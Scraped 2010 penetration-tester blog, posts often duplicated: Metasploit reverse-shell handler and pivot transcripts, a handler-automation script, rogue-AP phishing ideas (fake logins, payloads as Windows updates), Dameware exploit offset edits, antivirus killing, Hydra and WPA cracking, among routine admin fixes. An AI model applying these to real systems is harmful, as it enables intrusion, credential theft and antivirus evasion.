Wednesday, December 29, 2010
Thursday, December 16, 2010
Tuesday, December 7, 2010
Monday, December 6, 2010
Wednesday, December 1, 2010
Wednesday, November 17, 2010
Thursday, November 11, 2010
Ice Symbol Lookup Error
Re-hosting the resolution since it appears Novell's server goes down from time to time when I attempted to re-reference:
Install Novell eDirctory Adminstration Utilies as follows.
Extract the tar.gz file for eDirectory installation and locate the directory /eDirectory/setup.
Type ./nds-install from the setup directory.
Select option 2 for installing Novell eDirectory Administartion utilities.
Edit /etc/ld.so.conf file and make sure entry /opt/novell/eDirectory/lib is in the file. If not add the path in there and save the file.
Type "ldconfig" and press Enter.
If the following error is received after following the steps listed above, please reboot the server
"ice: error while loading shared libraries: libldapsdk.so.0: cannot open shared object file: No such file or directory"
Install Novell eDirctory Adminstration Utilies as follows.
Extract the tar.gz file for eDirectory installation and locate the directory /eDirectory/setup.
Type ./nds-install from the setup directory.
Select option 2 for installing Novell eDirectory Administartion utilities.
Edit /etc/ld.so.conf file and make sure entry /opt/novell/eDirectory/lib is in the file. If not add the path in there and save the file.
Type "ldconfig" and press Enter.
If the following error is received after following the steps listed above, please reboot the server
"ice: error while loading shared libraries: libldapsdk.so.0: cannot open shared object file: No such file or directory"
Wednesday, November 10, 2010
Rogue Access Point
Rogue AP using GTWPA from Dean Liu on Vimeo.
GTWPA project is a wrapper around airbase-ng and dnsspoof. Redirects HTTP traffic to your malicious web server when the victim attempts to browse.
See project here:
crack-wifi.com/forum/viewtopic.php?id=363
I modified code base such that it enables attacking machine as web proxy after credentials are submitted.
You can serve up any login page you want. Here are some ideas: ask for credit card, Facebook login, serve up Metasploit payloads as Windows updates, etc.
Tuesday, November 9, 2010
Google Hacking Database
http://www.exploit-db.com/google-dorks/
Recently resurrected by exploit-db.
Repository of queries that may disclose sensitive information which may lead to compromise.
Saturday, November 6, 2010
Thursday, October 28, 2010
pam_appl.h and pam_modules.h "No such file or Directory"
If you're creating custom pam modules, you will need these two headers to compile your source code.
These header files are in the "pam-devel" package.
In SUSE - SLED/SLES use: 'yast -i pam-devel' to install the appropriate packages.
In SUSE - SLED/SLES use: 'yast -i pam-devel' to install the appropriate packages.
Monday, October 25, 2010
Scanning through SOCKS + Meterpreter
Source: http://www.digininja.org/blog/nessus_over_sock4a_over_msf.php
Below is a walk through of the steps I went through to get the scan. The actors in this play are:
192.168.0.2 - The attacking machine
10.1.1.5 - The compromised machine
10.1.1.2 - The machine I want to scan
There is no normal route from the 192 network into the 10 network, the router at 10.1.1.1 prevents this.
robin@attacker metasploit $ ./msfconsole
___________
< DigiNinja >
-----------
\ ^__^
\ (oo)\_______
(__)\ )\/\
||----w |
|| ||
=[ metasploit v3.5.1-dev [core:3.5 api:1.0]
+ -- --=[ 613 exploits - 309 auxiliary
+ -- --=[ 215 payloads - 27 encoders - 8 nops
=[ svn r10774 updated today (2010.10.21)
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lport 31337
lport => 31337
msf exploit(handler) > set lhost 192.168.0.2
lhost => 192.168.0.2
msf exploit(handler) > exploit -j
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.0.2:31337
[*] Starting the payload handler...
msf exploit(handler) > [*] Sending stage (749056 bytes) to 192.168.0.80
[*] Meterpreter session 1 opened (192.168.0.2:31337 -> 192.168.0.80:24592) at 2010-10-22 10:38:18 +0100
msf exploit(handler) > route add 10.1.1.0 255.255.255.0 1
msf exploit(handler) > use auxiliary/server/socks4a
msf auxiliary(socks4a) > run
[*] Auxiliary module execution completed
[*] Starting the socks4a proxy server
msf auxiliary(socks4a) >
Check the tunnel is working. I don't speak SMB but if you do this and see the OK then the connection has been made and you can just enter some rubbish and hit return a few times, the other end will drop the connection pretty quickly. Pick a port you know, or expect, to be open on the target machine, SMB is usually a good choice for a Windows box.
root@attacker sbin # proxychains nc 10.1.1.2 445
ProxyChains-3.1 (http://proxychains.sf.net)
|S-chain|-<>-127.0.0.1:1080-<><>-10.1.1.2:445-<><>-OK
dummy...
Before you start Nessus with proxychains you'll need to modify the proxychains config (/etc/proxychains.conf). In my default config I needed to add the following line to the end.
socks4 127.0.0.1 1080
And now start Nessus
root@attacker sbin # proxychains ./nessus-service -D
Scans take a LONG time, with a default Nessus policy it took me 4242 seconds to scan the compromised machine, that is nearly an hour and a quarter so I've created a minimal policy to work with for this type of scanning. First we load the nessus module the connect to it, check the policies and finally fire off a scan.
msf auxiliary(socks4a) > load nessus
[*] Nessus Bridge for Nessus 4.2.x
[+] Type nessus_help for a command listing
[*] Successfully loaded plugin: nessus
msf auxiliary(socks4a) > nessus_connect robin@localhost
[+] Password:
...
[*] Connecting to https://localhost:8834/ as robin
[*] Authenticated
msf auxiliary(socks4a) > nessus_policy_list
[+] Nessus Policy List
ID Name Comments
-- ---- --------
4 Minimal MS
3 noping
2 Web
1 All
msf auxiliary(socks4a) > nessus_scan_new 4 "Quick Windows" 10.1.1.2
[*] Creating scan from policy number 4, called "Quick Windows" and scanning 10.1.1.2
[*] Scan started. uid is 60625093-5e0c-74a0-bc04-a35f19ffa65adb108fa286291aee
msf auxiliary(socks4a) > nessus_scan_status
[+] Running Scans
Scan ID Name Owner Started Status Current Hosts Total Hosts
------- ---- ----- ------- ------ ------------- -----------
60625093-5e0c-74a0-bc04-a35f19ffa65adb108fa286291aee Quick Windows robin 12:39 Oct 22 2010 running 0 1
[*] You can:
[+] Import Nessus report to database : nessus_report_get
[+] Pause a nessus scan : nessus_scan_pause
Now sit back for a LONG wait. You can check the status with nessus_scan_status
msf auxiliary(socks4a) > nessus_scan_status
[+] Running Scans
Scan ID Name Owner Started Status Current Hosts Total Hosts
------- ---- ----- ------- ------ ------------- -----------
60625093-5e0c-74a0-bc04-a35f19ffa65adb108fa286291aee Quick Windows robin 12:39 Oct 22 2010 running 0 1
When it finall finishes you can check the results and load them into your Metasploit database
msf auxiliary(socks4a) > db_connect msf.db
[-] Note that sqlite is not supported due to numerous issues.
[-] It may work, but don't count on it
[*] Creating a new database file...
[*] Successfully connected to the database
[*] File: msf.db
msf auxiliary(socks4a) > nessus_report_get 60625093-5e0c-74a0-bc04-a35f19ffa65adb108fa286291aee
[*] importing 60625093-5e0c-74a0-bc04-a35f19ffa65adb108fa286291aee
[*] 10.1.1.2 Done!
[+] Done
msf auxiliary(socks4a) > db_hosts
Hosts
=====
address address6 arch comm comments created_at info mac name os_flavor os_lang os_name os_sp purpose state updated_at svcs vulns workspace
------- -------- ---- ---- -------- ---------- ---- --- ---- --------- ------- ------- ----- ------- ----- ---------- ---- ----- ---------
10.1.1.2 2010-10-22 14:09:22 UTC 00:13:3b:04:03:52 CORP_DC alive 2010-10-22 14:09:22 UTC 5 6 default
So, there we have it, a full Nessus scan through a Meterpreter pivot with everything done in memory on the compromised machine. A very neat and tidy attack.
Below is a walk through of the steps I went through to get the scan. The actors in this play are:
192.168.0.2 - The attacking machine
10.1.1.5 - The compromised machine
10.1.1.2 - The machine I want to scan
There is no normal route from the 192 network into the 10 network, the router at 10.1.1.1 prevents this.
robin@attacker metasploit $ ./msfconsole
___________
< DigiNinja >
-----------
\ ^__^
\ (oo)\_______
(__)\ )\/\
||----w |
|| ||
=[ metasploit v3.5.1-dev [core:3.5 api:1.0]
+ -- --=[ 613 exploits - 309 auxiliary
+ -- --=[ 215 payloads - 27 encoders - 8 nops
=[ svn r10774 updated today (2010.10.21)
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lport 31337
lport => 31337
msf exploit(handler) > set lhost 192.168.0.2
lhost => 192.168.0.2
msf exploit(handler) > exploit -j
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.0.2:31337
[*] Starting the payload handler...
msf exploit(handler) > [*] Sending stage (749056 bytes) to 192.168.0.80
[*] Meterpreter session 1 opened (192.168.0.2:31337 -> 192.168.0.80:24592) at 2010-10-22 10:38:18 +0100
msf exploit(handler) > route add 10.1.1.0 255.255.255.0 1
msf exploit(handler) > use auxiliary/server/socks4a
msf auxiliary(socks4a) > run
[*] Auxiliary module execution completed
[*] Starting the socks4a proxy server
msf auxiliary(socks4a) >
Check the tunnel is working. I don't speak SMB but if you do this and see the OK then the connection has been made and you can just enter some rubbish and hit return a few times, the other end will drop the connection pretty quickly. Pick a port you know, or expect, to be open on the target machine, SMB is usually a good choice for a Windows box.
root@attacker sbin # proxychains nc 10.1.1.2 445
ProxyChains-3.1 (http://proxychains.sf.net)
|S-chain|-<>-127.0.0.1:1080-<><>-10.1.1.2:445-<><>-OK
dummy...
Before you start Nessus with proxychains you'll need to modify the proxychains config (/etc/proxychains.conf). In my default config I needed to add the following line to the end.
socks4 127.0.0.1 1080
And now start Nessus
root@attacker sbin # proxychains ./nessus-service -D
Scans take a LONG time, with a default Nessus policy it took me 4242 seconds to scan the compromised machine, that is nearly an hour and a quarter so I've created a minimal policy to work with for this type of scanning. First we load the nessus module the connect to it, check the policies and finally fire off a scan.
msf auxiliary(socks4a) > load nessus
[*] Nessus Bridge for Nessus 4.2.x
[+] Type nessus_help for a command listing
[*] Successfully loaded plugin: nessus
msf auxiliary(socks4a) > nessus_connect robin@localhost
[+] Password:
...
[*] Connecting to https://localhost:8834/ as robin
[*] Authenticated
msf auxiliary(socks4a) > nessus_policy_list
[+] Nessus Policy List
ID Name Comments
-- ---- --------
4 Minimal MS
3 noping
2 Web
1 All
msf auxiliary(socks4a) > nessus_scan_new 4 "Quick Windows" 10.1.1.2
[*] Creating scan from policy number 4, called "Quick Windows" and scanning 10.1.1.2
[*] Scan started. uid is 60625093-5e0c-74a0-bc04-a35f19ffa65adb108fa286291aee
msf auxiliary(socks4a) > nessus_scan_status
[+] Running Scans
Scan ID Name Owner Started Status Current Hosts Total Hosts
------- ---- ----- ------- ------ ------------- -----------
60625093-5e0c-74a0-bc04-a35f19ffa65adb108fa286291aee Quick Windows robin 12:39 Oct 22 2010 running 0 1
[*] You can:
[+] Import Nessus report to database : nessus_report_get
[+] Pause a nessus scan : nessus_scan_pause
Now sit back for a LONG wait. You can check the status with nessus_scan_status
msf auxiliary(socks4a) > nessus_scan_status
[+] Running Scans
Scan ID Name Owner Started Status Current Hosts Total Hosts
------- ---- ----- ------- ------ ------------- -----------
60625093-5e0c-74a0-bc04-a35f19ffa65adb108fa286291aee Quick Windows robin 12:39 Oct 22 2010 running 0 1
When it finall finishes you can check the results and load them into your Metasploit database
msf auxiliary(socks4a) > db_connect msf.db
[-] Note that sqlite is not supported due to numerous issues.
[-] It may work, but don't count on it
[*] Creating a new database file...
[*] Successfully connected to the database
[*] File: msf.db
msf auxiliary(socks4a) > nessus_report_get 60625093-5e0c-74a0-bc04-a35f19ffa65adb108fa286291aee
[*] importing 60625093-5e0c-74a0-bc04-a35f19ffa65adb108fa286291aee
[*] 10.1.1.2 Done!
[+] Done
msf auxiliary(socks4a) > db_hosts
Hosts
=====
address address6 arch comm comments created_at info mac name os_flavor os_lang os_name os_sp purpose state updated_at svcs vulns workspace
------- -------- ---- ---- -------- ---------- ---- --- ---- --------- ------- ------- ----- ------- ----- ---------- ---- ----- ---------
10.1.1.2 2010-10-22 14:09:22 UTC 00:13:3b:04:03:52 CORP_DC alive 2010-10-22 14:09:22 UTC 5 6 default
So, there we have it, a full Nessus scan through a Meterpreter pivot with everything done in memory on the compromised machine. A very neat and tidy attack.
Wednesday, October 20, 2010
psexec logon failure and access denied
If you're experiencing logon failures with your lab testing in psexec (be it standalone psexec tool, or the auxiliary psexec module found within Metasploit)
Source: http://antonperez.com/2007/11/28/pstools-access-denied-error/
Here are the settings/steps I checked/took that resolved the issue:
1. ping - was able to ping the machine by hostname. So no problem here.
2. net share - verified the ADMIN$ share was enabled. Again no problem here.
3. Remote Registry service - verified the service was started because the PsTools suite makes use of RPC calls via port 445. Was fine here.
4. Administrator password - verified the Administrator did not have an empty password. Was set here.
5. Test account - created a test account to use for psexec (e.g., psexec \\computer_name notepad.exe -u test -p test). Was available here.
6. Access hidden share – tried to access C$ and found that user name field grayed out. This tipped off the problem – cool!
To fix it, I had to set the "Network Access: Sharing and security model for local accounts security option Classic – local users authenticate as themselves."
Access it via Start > Run > secpol.msc > Local Policies > Security Options
Change "Network Access: Sharing and security model for local accounts" to "Classic - local users authenticate as themselves"
Apparently, updates to Windows XP now sets this security option to Guest only – local users authenticate as Guest, which denies the ability to implicitly or explicitly use of a specific user name/password combo.
Source: http://antonperez.com/2007/11/28/pstools-access-denied-error/
Here are the settings/steps I checked/took that resolved the issue:
1. ping - was able to ping the machine by hostname. So no problem here.
2. net share - verified the ADMIN$ share was enabled. Again no problem here.
3. Remote Registry service - verified the service was started because the PsTools suite makes use of RPC calls via port 445. Was fine here.
4. Administrator password - verified the Administrator did not have an empty password. Was set here.
5. Test account - created a test account to use for psexec (e.g., psexec \\computer_name notepad.exe -u test -p test). Was available here.
6. Access hidden share – tried to access C$ and found that user name field grayed out. This tipped off the problem – cool!
To fix it, I had to set the "Network Access: Sharing and security model for local accounts security option Classic – local users authenticate as themselves."
Access it via Start > Run > secpol.msc > Local Policies > Security Options
Change "Network Access: Sharing and security model for local accounts" to "Classic - local users authenticate as themselves"
Apparently, updates to Windows XP now sets this security option to Guest only – local users authenticate as Guest, which denies the ability to implicitly or explicitly use of a specific user name/password combo.
Friday, October 15, 2010
Thursday, October 14, 2010
Tuesday, October 12, 2010
Monday, October 11, 2010
Monday, September 27, 2010
Saturday, September 18, 2010
Thursday, August 19, 2010
Tuesday, August 17, 2010
Sunday, August 15, 2010
Windows Associated PID with Port
Unlike linux's nice netstat -anp, windows yet again tries to make life difficult to accomplish the same task:
tasklist /svc /FI "PID eq [port]" //displays service associated with open port.
Monday, August 9, 2010
Automating Metasploit with Shell Scripting
Created a small shell script to automate the multi/handler in Metasploit. This script works with msfpayload executable (ex: ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.6 LPORT=8080 X > happy.exe) .
MSF_PATH="/pentest/exploits/framework3/"
MSFCLI=$MSF_PATH"msfcli";
INTERFACE="eth0";
LPORT="8080";
PAYLOAD="windows/meterpreter/reverse_tcp";
echo "Metasploit multi/handler";
LHOST=`ifconfig $INTERFACE | grep "inet addr" | cut -d":" -f2 | cut -d" " -f1`;
echo "LHOST=$LHOST";
echo "LPORT=$LPORT";
$MSFCLI multi/handler PAYLOAD=$PAYLOAD LHOST=$LHOST LPORT=$LPORT E
Thursday, August 5, 2010
Windows net user commands reference
Reference: http://articles.techrepublic.com.com/5100-10878_11-5031577.html
ex: net user [account] /delete
/DOMAIN—Performs the operation on a domain controller of the current domain.
/ADD—Adds a user account to the user accounts database.
/DELETE—Removes a user account from the user accounts database.
/ACTIVE:—Type /ACTIVE:YES to activate the account. /ACTIVE:NO deactivates the account.
/COMMENT:”text”—You can use this command to provide a comment about the user. You can enter up to 48 characters as a description. Make sure you enclose the comment in quotation marks.
/COUNTRYCODE:—This switch allows you to change the operating system country code for the user. This will cause Windows to implement a language file for a user's help and error messages. A value of 0 signifies the default country code.
/EXPIRES:—This switch allows you to set an expiration date for the user. You can either enter a date in mm/dd/yyyy format or enter a value of NEVER. NEVER sets no expiration for the account.
/FULLNAME:"name"—This switch changes the user's full name, not the username. Replace name with the user’s name enclosed in quotation marks.
/HOMEDIR:pathname—This switch sets the path (pathname) for the user's home directory. The path must already exist for the switch to work properly.
/PASSWORDCHG:—If you type /PASSWORDCHG:YES, users can change their own passwords. Conversely, setting it to NO disables password changing. The default is YES.
/PASSWORDREQ:—This switch specifies whether a user account must have a password. The default is YES, but you can type /PASSWORDREQ:NO to disable passwords for the account.
/PROFILEPATH:pathname—This switch sets a path for the user's logon profile.
/SCRIPTPATH:pathname—This switch sets the location of the user's logon script.
/TIMES:—This switch allows you to set the user’s logon hours. If you set the value to ALL, the user can always log on. The syntax is reasonably complicated if you want to set available logon times. Times can only be expressed in one-hour increments. Starting times/days and ending times/days are separated by a dash (-). Days, and times in the same day, are separated by a comma (,). Multiple day/time combinations are separated by a semicolon (;). This might be a setting that would be more efficient using a GUI.
/USERCOMMENT:"text"—This switch sets the User Comment field shown above. Don’t confuse it with the Comment switch just mentioned.
/WORKSTATIONS:—This switch allows you to specify workstation names the user can log in from. By default, a user can use any workstation. You can specify this explicitly by following this switch with an asterisk (*). To limit a user, type in individual workstation names. You can enter as many as eight workstation names, separating each one with a comma.
ex: net user [account] /delete
/DOMAIN—Performs the operation on a domain controller of the current domain.
/ADD—Adds a user account to the user accounts database.
/DELETE—Removes a user account from the user accounts database.
/ACTIVE:—Type /ACTIVE:YES to activate the account. /ACTIVE:NO deactivates the account.
/COMMENT:”text”—You can use this command to provide a comment about the user. You can enter up to 48 characters as a description. Make sure you enclose the comment in quotation marks.
/COUNTRYCODE:—This switch allows you to change the operating system country code for the user. This will cause Windows to implement a language file for a user's help and error messages. A value of 0 signifies the default country code.
/EXPIRES:—This switch allows you to set an expiration date for the user. You can either enter a date in mm/dd/yyyy format or enter a value of NEVER. NEVER sets no expiration for the account.
/FULLNAME:"name"—This switch changes the user's full name, not the username. Replace name with the user’s name enclosed in quotation marks.
/HOMEDIR:pathname—This switch sets the path (pathname) for the user's home directory. The path must already exist for the switch to work properly.
/PASSWORDCHG:—If you type /PASSWORDCHG:YES, users can change their own passwords. Conversely, setting it to NO disables password changing. The default is YES.
/PASSWORDREQ:—This switch specifies whether a user account must have a password. The default is YES, but you can type /PASSWORDREQ:NO to disable passwords for the account.
/PROFILEPATH:pathname—This switch sets a path for the user's logon profile.
/SCRIPTPATH:pathname—This switch sets the location of the user's logon script.
/TIMES:—This switch allows you to set the user’s logon hours. If you set the value to ALL, the user can always log on. The syntax is reasonably complicated if you want to set available logon times. Times can only be expressed in one-hour increments. Starting times/days and ending times/days are separated by a dash (-). Days, and times in the same day, are separated by a comma (,). Multiple day/time combinations are separated by a semicolon (;). This might be a setting that would be more efficient using a GUI.
/USERCOMMENT:"text"—This switch sets the User Comment field shown above. Don’t confuse it with the Comment switch just mentioned.
/WORKSTATIONS:—This switch allows you to specify workstation names the user can log in from. By default, a user can use any workstation. You can specify this explicitly by following this switch with an asterisk (*). To limit a user, type in individual workstation names. You can enter as many as eight workstation names, separating each one with a comma.
Friday, July 30, 2010
Thursday, July 22, 2010
Wednesday, June 30, 2010
Meterpreter VNC and Screen unlock
Note: May need to run vnc twice due to some bugs.
meterpreter > run screen_unlock
Monday, June 21, 2010
Bypassing AV with msfencode
Example of encoding with shikata, 10 iterations.
Thursday, June 17, 2010
Wednesday, June 16, 2010
Configuring Cisco VPN client on Ubuntu/BT4
Source:
Directly copy and pasted:
Client config:
* Download cisco-decrypt file which will be used to decrypt the group password from your pcf file:
wget http://www.debuntu.org/files/cisco-decrypt.c
sudo apt-get install libgcrypt11-dev
gcc -Wall -o cisco-decrypt cisco-decrypt.c $(libgcrypt-config
--libs--cflags)
chmod +x cisco-decrypt
sudo cp cisco-decrypt /usr/bin
* Download pcf2vpnc to convert pcf files in vpnc configuration format
wget http://svn.unix-ag.uni-kl.de/vpnc/trunk/pcf2vpnc
chmod +x pcf2vpnc
sudo cp pcf2vpnc /usr/bin
* Go to windows vpn profiles directory and convert .pcf files to .conf files
pcf2vpnc cisco.pcf > cisco.conf
Note:replace above cisco.pcf with your own .pcf file.
sudo cp cisco.conf /etc/vpnc/
* install vpnc and connect to vpn
sudo apt-get install vpnc resolvconf
sudo vpnc cisco
Enter username for
Enter password for
VPNC started in background (pid: 6092)…
* To disconnect simply do
sudo vpnc-disconnect
After your VPN has been established then connect to your remote desktop
Go to Applications >> Internet >> Terminal server client
Or
In terminal run
tsclient
Thursday, June 10, 2010
Wednesday, June 2, 2010
Symantec SIM Command Line DB2 Backups
As db2admin:
Scanning through Meterpreter and SSH Tunnel
By Mark Baggett
The Players
Attacker 172.16.186.132
Victim 172.16.186.126
Step 1 - After you have meterpreter access install OpenSSH on the victim's computer. Joff Thyer, packet guru, crazy aussie and all around smart guy did a great job of outlining the install process on his blog. I pretty much just followed his instructions here.
Step 2 - After you've installed OpenSSH and setup your account use Meterpreters PORTFWD command to forward a port from the attacker's machine to the SSH listener on the victim's machine. For example:
meterpreter> portfwd add -L 172.16.186.132 -l 8000 -r 172.16.186.128 -p 22
(Notes to self: alternatively without Meterpreter: ssh -L 8000:localhost:22 username@victim)
This command sets up a listener on port 8000 of the attacker's IP (172.16.186.132) and forwards packets to port 22 on the victim's machine (172.16.186.128).
Step 3 - SSH into the portfwd port you just created and setup a dynamic port forwarder on your machine. For example:
# ssh -D 127.0.0.1:9000 -p 8000 username@172.16.186.132
Step 5 - Start the nessus client and do you scan.
The Players
Attacker 172.16.186.132
Victim 172.16.186.126
Step 1 - After you have meterpreter access install OpenSSH on the victim's computer. Joff Thyer, packet guru, crazy aussie and all around smart guy did a great job of outlining the install process on his blog. I pretty much just followed his instructions here.
Step 2 - After you've installed OpenSSH and setup your account use Meterpreters PORTFWD command to forward a port from the attacker's machine to the SSH listener on the victim's machine. For example:
meterpreter> portfwd add -L 172.16.186.132 -l 8000 -r 172.16.186.128 -p 22
(Notes to self: alternatively without Meterpreter: ssh -L 8000:localhost:22 username@victim)
This command sets up a listener on port 8000 of the attacker's IP (172.16.186.132) and forwards packets to port 22 on the victim's machine (172.16.186.128).
Step 3 - SSH into the portfwd port you just created and setup a dynamic port forwarder on your machine. For example:
# ssh -D 127.0.0.1:9000 -p 8000 username@172.16.186.132
(My own notes: ssh -D 127.0.0.1:9000 -p 8000 username@attackermachine)
This command sets up a SOCKS4 proxy on port 9000 which is forwarded through the SSH session on the victim.
Step 4 - Use PROXYCHAINS to forward your nessusd traffic through the SOCKS4 listener on port 9000. This is as simple as changing the TCP port on the last line of /etc/proxychains.conf from its default of 9050 to port 9000 and launching nessusd through proxychains as follows:
# proxychains /usr/sbin/nessusd -D
This command sets up a SOCKS4 proxy on port 9000 which is forwarded through the SSH session on the victim.
Step 4 - Use PROXYCHAINS to forward your nessusd traffic through the SOCKS4 listener on port 9000. This is as simple as changing the TCP port on the last line of /etc/proxychains.conf from its default of 9050 to port 9000 and launching nessusd through proxychains as follows:
# proxychains /usr/sbin/nessusd -D
Step 5 - Start the nessus client and do you scan.
Thursday, May 27, 2010
Follow up on Dameware Exploit
A follow up on the Dameware post. After updating to latest SP3 hotfixes and patches, the memory address for "jmp esp" is changed again on kernel32.dll.
At the time of this post, the new memory is:
0x7C874413
At the time of this post, the new memory is:
0x7C874413
Wednesday, May 26, 2010
Dameware Mini Remote Control Client Agent Exploit Windows XP SP3
/Start update 3/2/2011
After updating to latest SP3 hotfixes and patches, the memory address for "jmp esp" is changed again on kernel32.dll.
At the time of this post, the new memory is:
0x7C874413
/End update
An oldy, but during a pentest the client had an old version of Dameware, however running on Windows XP SP3 (not supported) by the following above code.
In the following lines where the code defines its static offset addresses to locate the "jmp esp" command:
target_os[] = ...
"WIN XP" ,{{ 0x71ab7bfb,"kernel32.dll" },{ 0x71ab7bfb,"ws2_32.dll" },{ 0x7C941EED,"ws2_32.dll" },{ 0x00000000,"unknown.dll" },{ 0x00000000,"unknown.dll" },{ 0x00000000,"unknown.dll" },{ 0x00000000,"unknown.dll" }}},
...
We can see that item "3" is set to 0x00000000 and unknown.dll. This placeholder is for XP SP3.
Using Immunity Debugger and sifting through Dameware's modules, I found that it is using kernel32.dll 's jmp esp.
Thus, replace item 3 with 0x7C86467B, "kernel32.dll" to effectively altering the script to support Windows XP SP3.
Like most Buffer Overflow exploits, this one, you only get one shot before nuking the service. Thus, double check and test the exploit before carrying it out.
Tuesday, May 25, 2010
Tabnabbing
New type of phishing. This is ingenius:
Sunday, May 16, 2010
Port sweep
Quick and dirty portsweep script:
#!/bin/sh
if [ "$1" == "" ] || [ "$2" == "" ]
then
echo "./port_scan.sh [hostlist_file] [port]"
else
for host in `cat $1`
do
echo "scanning $host"
nmap -oG $host-$2.out -v $host/24 -p$2 -P0
done
grep open *$2.out | cut -d" " -f2 > $2.lst
fi
#!/bin/sh
if [ "$1" == "" ] || [ "$2" == "" ]
then
echo "./port_scan.sh [hostlist_file] [port]"
else
for host in `cat $1`
do
echo "scanning $host"
nmap -oG $host-$2.out -v $host/24 -p$2 -P0
done
grep open *$2.out | cut -d" " -f2 > $2.lst
fi
*.lst contains a list of IPs only.
Saturday, May 15, 2010
Thursday, May 13, 2010
Friday, May 7, 2010
Cross-Compiling on BT4
#cd /root/.wine/drive_c/MinGW/bin
#wine gcc.exe [file].c -o [output]
Often times the code will use winsock (for initiating shells over TCP), in this case use the lws2_32 flag:
-lws2_32
#wine gcc.exe [file].c -o [output] -lws2_32
#wine gcc.exe [file].c -o [output]
Often times the code will use winsock (for initiating shells over TCP), in this case use the lws2_32 flag:
-lws2_32
#wine gcc.exe [file].c -o [output] -lws2_32
Wednesday, May 5, 2010
Monday, May 3, 2010
Converting and Merging capture (.cap) files
Convert:
ivstools --convert [cap_file] [converted_file_name]ivstools --convert [airportSniff2NfxpB.cap] [sniff.ivs]
Merging:
ivstools --merge [ivs_file1] [ivs_file2] ... [merged_output_file_name]
ivstools --merge sniff1.ivs sniff2.ivs sniff_out.ivs
Saturday, May 1, 2010
Piping JTR to Aircrack
./john -incremental=All --stdout | aircrack-ng - e [ssid] -w - [capture_file]
Ex:
Thursday, April 29, 2010
Use OS X Airport for wireless sniffing
Scan for networks:
/System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport en1 scan
Sniff:
sudo /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport sniff
Create a symbolic link to the binary so you can easily execute it from your path if you wish.
Resultant sniff will dump the *.cap file in /tmp. Use aircrack-ng to crack the cap file now once you've captured enough IVs and/or handshake.
Monday, April 26, 2010
Disabling Kaspersky via CatchMe.exe
Kaspersky Anti-Virus is a pain such that Meterpreter cannot disable it via the command "killav". Administrative privs still does not give you enough permissions because the Anti Virus nests itself into the kernel.
Use CatchMe.exe
The following is destructive, read more about CatchMe before issuing the commands:
catchme.exe -K "c:\Program Files\Kaspersky\avp.exe"
catchme.exe -E "c:\Program Files\Kaspersky\avp.exe"
catchme.exe -O "c:\Program Files\Kaspersky\avp.exe" [file]
catchme.exe -E "c:\Program Files\Kaspersky\avp.exe"
catchme.exe -O "c:\Program Files\Kaspersky\avp.exe" [file]
reboot
or
attempt to remove catchme.exe from memory with: Darkspy, Seem, Icesword GUI
Above information found here in a nice Meterpreter cheatsheet:
Sunday, April 25, 2010
Samba 2.2.x Exploit
A nice oldie that worked for me:
http://www.milw0rm.com/exploits/7
From Nessus:
Samba <>
An attacker needs to be able to access at least one share to exploit
this flaw.
In addition, it is reported that Samba contains a flaw
related to the handling of .reg files that may allow
a local user to overwrite arbitrary file.
http://www.milw0rm.com/exploits/7
From Nessus:
Samba <>
An attacker needs to be able to access at least one share to exploit
this flaw.
In addition, it is reported that Samba contains a flaw
related to the handling of .reg files that may allow
a local user to overwrite arbitrary file.
Usage:
./samba_2.2.8_bufferoverflow.pl -tlinx86 -H [local_ip] -h[victim_ip]
./samba_2.2.8_bufferoverflow.pl -tlinx86 -H [local_ip] -h[victim_ip]
Friday, April 23, 2010
THC-Hydra HTTP-POST-FORM bug
On BackTrack Final 4, there is a bug with Hydra that will prevent you from brute forcing HTTP-POST/GET forms. See following description:
To solve:
Download source:
Get patch:
Apply patch:
$[path_to_hydra_src] < patch -p1 [patch_file]
$./configure
$ make
$ sudo make install
You may receive a libssh error like I did. This was a bug in the pre-final release of BackTrack. To apply the libssh patch download:
Patch again:
$[path_to_hydra_src] < patch -p1 [patch_file]
$./configure
$ make
$ sudo make install
Example command:
hydra -t2 -e ns -L ~/projects/offsec/users.txt -P ~/projects/offsec/passwords.txt -f 192.168.11.223 http-post-form "/flatfilelogin/login.php:username=^USER^&password=^PASS^&submit=Login:Incorrect" -V
Where /flatfilelogin/login.php is the POST BACK action form.
username is username's input field form ID
password is the password's input field form ID
Incorrect is the bad display image. Note: You should check whether this string is returned back by the post back page, otherwise Hydra will return always as successful.
Note to self: If you are receiving false positives, check for other potential hidden POST form fields to also include.
Symantec SIM - High Availibility - Restoring Incidents
The following is not supported by Symantec. Modify at your own risk:
In the event of a catastrophic failure on a SSIM correlation device, we need to be able to restore the incidents on a secondary backup SSIM. DB2 restore in the web console effectively restores the incidents, however if you were to attempt to drill down into the incidents to pull up additional information on specific events, it will still reference the archive on the failed SSIM. We need to be able to reference the new archive on the secondary SSIM.
Events stored in /eventarchive are regularly backed up to an external storage device. These events will be transferred to the secondary backup SSIM in case the primary SSIM fails. Thus the filenames stored in /eventarchive will be identical.
Events stored in /eventarchive are regularly backed up to an external storage device. These events will be transferred to the secondary backup SSIM in case the primary SSIM fails. Thus the filenames stored in /eventarchive will be identical.
To re-point the incidents to the new archive, a new unique archive ID needs to be generated, and the incidents need to point to the new archive ID. You cannot have two archives with the same ID even if they are on different correlation managers.
The incidents reference the event archive via a hex encoded value.
Issue following query as db2admin:
$ db2 connect to sesa
$ db2 -x "SELECT SESA_GUID FROM symcmgmt.symc_imr_associated_event_view"
Example output:
638a:20100318103824:700001
The first item 638a before the colon references the unique archive ID. This needs to be changed to the new archive ID of the secondary backup SSIM.
Thursday, April 22, 2010
SSH Tunneling
Using a machine as a pivot/proxy, we need to make an unrouteable remote machine's service routeable. Following example tunnels port 445.
My IP: 192.168.10.88
Machine 1: 192.168.11.72 //We have access to this machine. Has route to machine 2
Machine 2: 10.2.2.50 //Unrouteable from my local machine
On Machine 1, create the tunnel to map remote TCP port 445 to my machine's local TCP port 445.
$ssh -l [local_username] -R [local_port]:[remote_ip]:[remote_port] [local_ip]
